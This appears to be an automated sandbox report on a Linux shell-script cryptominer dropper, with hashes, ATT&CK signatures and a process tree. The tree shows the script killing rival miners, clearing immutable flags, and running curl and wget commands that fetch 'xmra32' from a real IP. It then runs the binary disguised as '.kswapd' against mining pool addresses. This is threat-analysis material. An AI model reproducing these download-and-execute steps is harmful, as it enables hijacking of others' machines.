Analysis
-
max time kernel
126s -
max time network
127s -
platform
debian-9_armhf -
resource
debian9-armhf-20240729-en -
resource tags
arch:armhfimage:debian9-armhf-20240729-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem -
submitted
27/03/2025, 15:57
Static task
static1
Behavioral task
behavioral1
Sample
80faa26a8f697e16f72239936a4ef7863742c78dc2a997abaf3265cda51a5514.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
80faa26a8f697e16f72239936a4ef7863742c78dc2a997abaf3265cda51a5514.sh
Resource
debian9-armhf-20240729-en
Behavioral task
behavioral3
Sample
80faa26a8f697e16f72239936a4ef7863742c78dc2a997abaf3265cda51a5514.sh
Resource
debian9-mipsbe-20240418-en
Behavioral task
behavioral4
Sample
80faa26a8f697e16f72239936a4ef7863742c78dc2a997abaf3265cda51a5514.sh
Resource
debian9-mipsel-20240226-en
General
-
Target
80faa26a8f697e16f72239936a4ef7863742c78dc2a997abaf3265cda51a5514.sh
-
Size
5KB
-
MD5
7b72cf30ac42c20f0a14b0b87425c00a
-
SHA1
74402152ac0f0c9dfed6f76975080ce1d0d4584d
-
SHA256
80faa26a8f697e16f72239936a4ef7863742c78dc2a997abaf3265cda51a5514
-
SHA512
1587b6707b334800f2c4fa7d664542cda84a63c5534b4513003f786058b7d2ef6d22f0f18bdb3d6a81c6a4ea8897453592d4c9bcea0a2e2b62a47f325dbff5eb
-
SSDEEP
96:Dy0G/8yXwI7gzNnwNnP7fbunnbunJKDnWDnbJtgTGQFE/WztGz:Dw5XwKgRaTzUbUesdtgTGQFE/G8
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 4 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 718 chmod 852 chmod 927 chmod 1016 chmod -
Executes dropped EXE 2 IoCs
ioc pid Process /.cache/.kswapd 854 80faa26a8f697e16f72239936a4ef7863742c78dc2a997abaf3265cda51a5514.sh /.cache/.kswapd 1017 80faa26a8f697e16f72239936a4ef7863742c78dc2a997abaf3265cda51a5514.sh -
Attempts to change immutable files 24 IoCs
Modifies inode attributes on the filesystem to allow changing of immutable files.
pid Process 786 grep 797 grep 967 grep 972 grep 985 grep 717 chattr 766 grep 802 grep 809 grep 828 grep 981 grep 989 grep 993 grep 792 grep 997 grep 1001 grep 762 grep 781 grep 823 grep 926 chattr 976 grep 758 grep 770 grep 776 grep -
Enumerates running processes
Discovers information about currently running processes on the system
-
Write file to user bin folder 1 IoCs
description ioc Process File opened for modification /usr/local/bin/.HE32B5YV2 80faa26a8f697e16f72239936a4ef7863742c78dc2a997abaf3265cda51a5514.sh -
Checks CPU configuration 1 TTPs 3 IoCs
Checks CPU information which indicate if the system is a virtual machine.
description ioc Process File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl -
Reads CPU attributes 1 TTPs 6 IoCs
description ioc Process File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online ps -
Process Discovery 1 TTPs 6 IoCs
Adversaries may try to discover information about running processes.
pid Process 738 ps 929 ps 947 ps 697 ps 706 ps 720 ps -
description ioc Process File opened for reading /proc/23/stat ps File opened for reading /proc/703/stat ps File opened for reading /proc/25/cmdline ps File opened for reading /proc/2/status ps File opened for reading /proc/271/cmdline ps File opened for reading /proc/703/stat ps File opened for reading /proc/137/status ps File opened for reading /proc/302/status ps File opened for reading /proc/942/cmdline ps File opened for reading /proc/105/cmdline ps File opened for reading /proc/265/cmdline ps File opened for reading /proc/15/stat ps File opened for reading /proc/308/cmdline ps File opened for reading /proc/9/stat ps File opened for reading /proc/20/status ps File opened for reading /proc/714/cmdline ps File opened for reading /proc/28/status ps File opened for reading /proc/631/stat ps File opened for reading /proc/137/stat ps File opened for reading /proc/653/cmdline ps File opened for reading /proc/filesystems ps File opened for reading /proc/643/cmdline ps File opened for reading /proc/266/cmdline ps File opened for reading /proc/271/stat ps File opened for reading /proc/938/status ps File opened for reading /proc/3/stat ps File opened for reading /proc/645/status ps File opened for reading /proc/4/status ps File opened for reading /proc/719/cmdline ps File opened for reading /proc/720/stat ps File opened for reading /proc/720/cmdline ps File opened for reading /proc/725/cmdline ps File opened for reading /proc/742/stat ps File opened for reading /proc/643/status ps File opened for reading /proc/311/stat ps File opened for reading /proc/25/cmdline ps File opened for reading /proc/288/cmdline ps File opened for reading /proc/13/status ps File opened for reading /proc/137/status ps File opened for reading /proc/41/stat ps File opened for reading /proc/137/cmdline ps File opened for reading /proc/643/stat ps File opened for reading /proc/707/stat ps File opened for reading /proc/5/stat ps File opened for reading /proc/734/status ps File opened for reading /proc/sys/kernel/osrelease ps File opened for reading /proc/18/status ps File opened for reading /proc/311/status ps File opened for reading /proc/42/stat ps File opened for reading /proc/311/stat ps File opened for reading /proc/578/status ps File opened for reading /proc/703/stat ps File opened for reading /proc/582/cmdline ps File opened for reading /proc/6/status ps File opened for reading /proc/268/status ps File opened for reading /proc/12/status ps File opened for reading /proc/271/status ps File opened for reading /proc/147/stat ps File opened for reading /proc/22/cmdline ps File opened for reading /proc/308/cmdline ps File opened for reading /proc/29/cmdline ps File opened for reading /proc/147/status ps File opened for reading /proc/729/stat ps File opened for reading /proc/218/status ps -
Writes file to shm directory 1 IoCs
Malware can drop malicious files in the shm directory which will run directly from RAM.
description ioc Process File opened for modification /dev/shm/.HE32B5YV2 80faa26a8f697e16f72239936a4ef7863742c78dc2a997abaf3265cda51a5514.sh -
Writes file to tmp directory 1 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/.HE32B5YV2 80faa26a8f697e16f72239936a4ef7863742c78dc2a997abaf3265cda51a5514.sh
Processes
-
/tmp/80faa26a8f697e16f72239936a4ef7863742c78dc2a997abaf3265cda51a5514.sh/tmp/80faa26a8f697e16f72239936a4ef7863742c78dc2a997abaf3265cda51a5514.sh1⤵
- Executes dropped EXE
- Write file to user bin folder
- Writes file to shm directory
- Writes file to tmp directory
PID:645 -
/bin/unameuname -a2⤵PID:647
-
-
/bin/grepgrep " rm does not remove dir"2⤵PID:655
-
-
/bin/rmrm --help2⤵PID:654
-
-
/usr/bin/wcwc -l2⤵PID:656
-
-
/bin/grepgrep -i "Dump libcurl equivalent"2⤵PID:661
-
-
/usr/bin/wcwc -l2⤵PID:662
-
-
/usr/bin/curlcurl --help2⤵
- Checks CPU configuration
PID:660
-
-
/bin/grepgrep -i "wgetrc "2⤵PID:671
-
-
/usr/bin/wcwc -l2⤵PID:672
-
-
/usr/bin/wgetwget --version2⤵PID:670
-
-
/usr/bin/trtr -dc A-Za-z0-92⤵PID:679
-
-
/usr/bin/headhead /dev/urandom2⤵PID:678
-
-
/usr/bin/shufshuf -i 4-16 -n 12⤵PID:682
-
-
/usr/bin/headhead -c 92⤵PID:680
-
-
/bin/rmrm -f /tmp/.HE32B5YV22⤵PID:687
-
-
/bin/rmrm -f /tmp/.HE32B5YV22⤵PID:689
-
-
/bin/rmrm -f /usr/local/bin/.HE32B5YV22⤵PID:691
-
-
/bin/rmrm -f /dev/shm/.HE32B5YV22⤵PID:692
-
-
/bin/rmrm -f /.HE32B5YV22⤵PID:694
-
-
/bin/grepgrep -v grep2⤵PID:698
-
-
/bin/grepgrep -v defunct2⤵PID:699
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
- Reads runtime system information
PID:697
-
-
/bin/grepgrep -v "sh "2⤵PID:700
-
-
/bin/grepgrep " sleep 120"2⤵PID:701
-
-
/usr/bin/wcwc -l2⤵PID:702
-
-
/bin/grepgrep -v grep2⤵PID:707
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
- Reads runtime system information
PID:706
-
-
/bin/grepgrep -v "sh "2⤵PID:708
-
-
/bin/grepgrep -v defunct2⤵PID:709
-
-
/usr/bin/wcwc -l2⤵PID:711
-
-
/bin/grepgrep " sleep 120"2⤵PID:710
-
-
/bin/sleepsleep 1202⤵PID:715
-
-
/bin/mkdirmkdir -p /.cache/2⤵PID:716
-
-
/usr/bin/chattrchattr -i /.cache/2⤵
- Attempts to change immutable files
PID:717
-
-
/bin/chmodchmod 1755 /.cache/2⤵
- File and Directory Permissions Modification
PID:718
-
-
/bin/grepgrep -v l02⤵PID:721
-
-
/bin/grepgrep -v eth12⤵PID:722
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
- Reads runtime system information
PID:720
-
-
/bin/grepgrep -v lan02⤵PID:723
-
-
/bin/grepgrep -v "^-"2⤵PID:724
-
-
/bin/grepgrep -v eth02⤵PID:725
-
-
/bin/grepgrep -v inet02⤵PID:726
-
-
/bin/grepgrep -v lano2⤵PID:727
-
-
/bin/grepgrep -v grep2⤵PID:728
-
-
/bin/grepgrep -v defunct2⤵PID:729
-
-
/bin/grepgrep -v knthread2⤵PID:730
-
-
/bin/grepgrep -vi aaaaaaaaaa2⤵PID:731
-
-
/bin/grepgrep -vi "java "2⤵PID:732
-
-
/bin/grepgrep -vi jenkins2⤵PID:733
-
-
/bin/grepgrep -vi exim2⤵PID:734
-
-
/usr/bin/awkawk "{if(\$3>=54.0) print \$11}"2⤵PID:735
-
-
/usr/bin/headhead -n 12⤵PID:736
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
- Reads runtime system information
PID:738
-
-
/bin/grepgrep -v l02⤵PID:739
-
-
/bin/grepgrep -v eth12⤵PID:740
-
-
/bin/grepgrep -v lan02⤵PID:741
-
-
/bin/grepgrep -v "^-"2⤵PID:742
-
-
/bin/grepgrep -v eth02⤵PID:743
-
-
/bin/grepgrep -v inet02⤵PID:744
-
-
/bin/grepgrep -v lano2⤵PID:745
-
-
/bin/grepgrep -v grep2⤵PID:746
-
-
/bin/grepgrep -v defunct2⤵PID:747
-
-
/bin/grepgrep -v python2⤵PID:748
-
-
/bin/grepgrep -v knthread2⤵PID:749
-
-
/bin/grepgrep -vi aaaaaaaaaa2⤵PID:750
-
-
/bin/grepgrep -vi bash2⤵PID:751
-
-
/bin/grepgrep -vi exim2⤵PID:752
-
-
/usr/bin/awkawk "{if(\$3>=0.0) print \$2}"2⤵PID:753
-
-
/usr/bin/uniquniq2⤵PID:754
-
-
/bin/readlinkreadlink /proc/302/exe2⤵PID:756
-
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/302/exe2⤵
- Attempts to change immutable files
PID:758
-
-
/bin/readlinkreadlink /proc/311/exe2⤵PID:760
-
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/311/exe2⤵
- Attempts to change immutable files
PID:762
-
-
/bin/readlinkreadlink /proc/578/exe2⤵PID:764
-
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/578/exe2⤵
- Attempts to change immutable files
PID:766
-
-
/bin/readlinkreadlink /proc/579/exe2⤵PID:768
-
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/579/exe2⤵
- Attempts to change immutable files
PID:770
-
-
/bin/readlinkreadlink /proc/631/exe2⤵PID:773
-
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/631/exe2⤵
- Attempts to change immutable files
PID:776
-
-
/bin/readlinkreadlink /proc/637/exe2⤵PID:778
-
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/637/exe2⤵
- Attempts to change immutable files
PID:781
-
-
/bin/readlinkreadlink /proc/638/exe2⤵PID:784
-
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/638/exe2⤵
- Attempts to change immutable files
PID:786
-
-
/bin/readlinkreadlink /proc/642/cwd2⤵PID:788
-
-
/bin/catcat /proc/642/comm2⤵PID:789
-
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" //kdumpy2⤵
- Attempts to change immutable files
PID:792
-
-
/bin/readlinkreadlink /proc/643/cwd2⤵PID:793
-
-
/bin/catcat /proc/643/comm2⤵PID:794
-
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" //stahp_fdump2⤵
- Attempts to change immutable files
PID:797
-
-
/bin/readlinkreadlink /proc/644/cwd2⤵PID:799
-
-
/bin/catcat /proc/644/comm2⤵PID:800
-
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" //stahp_vma2⤵
- Attempts to change immutable files
PID:802
-
-
/bin/readlinkreadlink /proc/649/exe2⤵PID:807
-
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/649/exe2⤵
- Attempts to change immutable files
PID:809
-
-
/bin/rmrm -rf /usr/sbin/agent2⤵PID:817
-
-
/bin/readlinkreadlink /proc/653/exe2⤵PID:819
-
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/653/exe2⤵
- Attempts to change immutable files
PID:823
-
-
/bin/readlinkreadlink /proc/715/exe2⤵PID:825
-
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/715/exe2⤵
- Attempts to change immutable files
PID:828
-
-
/usr/bin/wcwc -l2⤵PID:834
-
-
/bin/grepgrep x86_642⤵PID:833
-
-
/usr/bin/curlcurl http://138.197.206.223/.x/xmra32 -o /.cache/.kswapd2⤵
- Checks CPU configuration
PID:836
-
-
/usr/bin/wgetwget http://138.197.206.223/.x/xmra32 -O /.cache/.kswapd2⤵PID:845
-
-
/bin/chmodchmod +x /.cache/.kswapd2⤵
- File and Directory Permissions Modification
PID:852
-
-
/bin/sleepsleep 1202⤵PID:924
-
-
/bin/mkdirmkdir -p /.cache/2⤵PID:925
-
-
/usr/bin/chattrchattr -i /.cache/2⤵
- Attempts to change immutable files
PID:926
-
-
/bin/chmodchmod 1755 /.cache/2⤵
- File and Directory Permissions Modification
PID:927
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
- Reads runtime system information
PID:929
-
-
/bin/grepgrep -v l02⤵PID:930
-
-
/bin/grepgrep -v lan02⤵PID:932
-
-
/bin/grepgrep -v eth12⤵PID:931
-
-
/bin/grepgrep -v "^-"2⤵PID:933
-
-
/bin/grepgrep -v eth02⤵PID:934
-
-
/bin/grepgrep -v inet02⤵PID:935
-
-
/bin/grepgrep -v lano2⤵PID:936
-
-
/bin/grepgrep -v grep2⤵PID:937
-
-
/bin/grepgrep -v defunct2⤵PID:938
-
-
/bin/grepgrep -v knthread2⤵PID:939
-
-
/bin/grepgrep -vi aaaaaaaaaa2⤵PID:940
-
-
/bin/grepgrep -vi "java "2⤵PID:941
-
-
/bin/grepgrep -vi jenkins2⤵PID:942
-
-
/bin/grepgrep -vi exim2⤵PID:943
-
-
/usr/bin/awkawk "{if(\$3>=54.0) print \$11}"2⤵PID:944
-
-
/usr/bin/headhead -n 12⤵PID:945
-
-
/bin/grepgrep -v l02⤵PID:948
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
- Reads runtime system information
PID:947
-
-
/bin/grepgrep -v eth12⤵PID:949
-
-
/bin/grepgrep -v lan02⤵PID:950
-
-
/bin/grepgrep -v "^-"2⤵PID:951
-
-
/bin/grepgrep -v eth02⤵PID:952
-
-
/bin/grepgrep -v inet02⤵PID:953
-
-
/bin/grepgrep -v lano2⤵PID:954
-
-
/bin/grepgrep -v grep2⤵PID:955
-
-
/bin/grepgrep -v defunct2⤵PID:956
-
-
/bin/grepgrep -v knthread2⤵PID:958
-
-
/bin/grepgrep -v python2⤵PID:957
-
-
/bin/grepgrep -vi aaaaaaaaaa2⤵PID:959
-
-
/bin/grepgrep -vi bash2⤵PID:960
-
-
/bin/grepgrep -vi exim2⤵PID:961
-
-
/usr/bin/awkawk "{if(\$3>=0.0) print \$2}"2⤵PID:962
-
-
/usr/bin/uniquniq2⤵PID:963
-
-
/bin/readlinkreadlink /proc/302/exe2⤵PID:965
-
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/302/exe2⤵
- Attempts to change immutable files
PID:967
-
-
/bin/readlinkreadlink /proc/311/exe2⤵PID:970
-
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/311/exe2⤵
- Attempts to change immutable files
PID:972
-
-
/bin/readlinkreadlink /proc/578/exe2⤵PID:974
-
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/578/exe2⤵
- Attempts to change immutable files
PID:976
-
-
/bin/readlinkreadlink /proc/579/exe2⤵PID:979
-
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/579/exe2⤵
- Attempts to change immutable files
PID:981
-
-
/bin/readlinkreadlink /proc/642/cwd2⤵PID:982
-
-
/bin/catcat /proc/642/comm2⤵PID:983
-
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" //kdumpy2⤵
- Attempts to change immutable files
PID:985
-
-
/bin/readlinkreadlink /proc/643/cwd2⤵PID:986
-
-
/bin/catcat /proc/643/comm2⤵PID:987
-
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" //stahp_fdump2⤵
- Attempts to change immutable files
PID:989
-
-
/bin/readlinkreadlink /proc/644/cwd2⤵PID:990
-
-
/bin/catcat /proc/644/comm2⤵PID:991
-
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" //stahp_vma2⤵
- Attempts to change immutable files
PID:993
-
-
/bin/readlinkreadlink /proc/906/cwd2⤵PID:994
-
-
/bin/catcat /proc/906/comm2⤵PID:995
-
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" //kworker/u2:22⤵
- Attempts to change immutable files
PID:997
-
-
/bin/readlinkreadlink /proc/924/exe2⤵PID:999
-
-
/bin/grepgrep -i "xmr\\|cryptonight\\|hashrate" /proc/924/exe2⤵
- Attempts to change immutable files
PID:1001
-
-
/usr/bin/cutcut -c 1-322⤵PID:1005
-
-
/usr/bin/md5summd5sum /.cache/.kswapd2⤵PID:1004
-
-
/usr/bin/md5summd5sum /.cache/.kswapd2⤵PID:1007
-
-
/usr/bin/cutcut -c 1-322⤵PID:1008
-
-
/bin/grepgrep x86_642⤵PID:1011
-
-
/usr/bin/wcwc -l2⤵PID:1012
-
-
/usr/bin/curlcurl http://138.197.206.223/.x/xmra32 -o /.cache/.kswapd2⤵
- Checks CPU configuration
PID:1014
-
-
/usr/bin/wgetwget http://138.197.206.223/.x/xmra32 -O /.cache/.kswapd2⤵PID:1015
-
-
/bin/chmodchmod +x /.cache/.kswapd2⤵
- File and Directory Permissions Modification
PID:1016
-
-
/.cache/.kswapd/.cache/.kswapd -o 185.165.171.78:8081 -o 185.86.148.14:8081 -B1⤵PID:854
-
/.cache/.kswapd/.cache/.kswapd -o 185.165.171.78:8081 -o 185.86.148.14:8081 -B1⤵PID:1017
Network
MITRE ATT&CK Enterprise v15
Defense Evasion
File and Directory Permissions Modification
1Linux and Mac File and Directory Permissions Modification
1Virtualization/Sandbox Evasion
1System Checks
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
10B
MD5b0e645ba6c87c078f77cccf471f53670
SHA16b3b0def0821512df872cf9d184b425322c7f021
SHA256707d484b025f4bdc7b265691aa53460618ce44811b4dded65be5e22af414996f
SHA512248434af42db794eea89990258b5cb77960b2be4f493ff76ce64cdd369bc741a2a7069e882dbb9604c19a4b09a656afdb1bc65df914190967e8beb05928975d8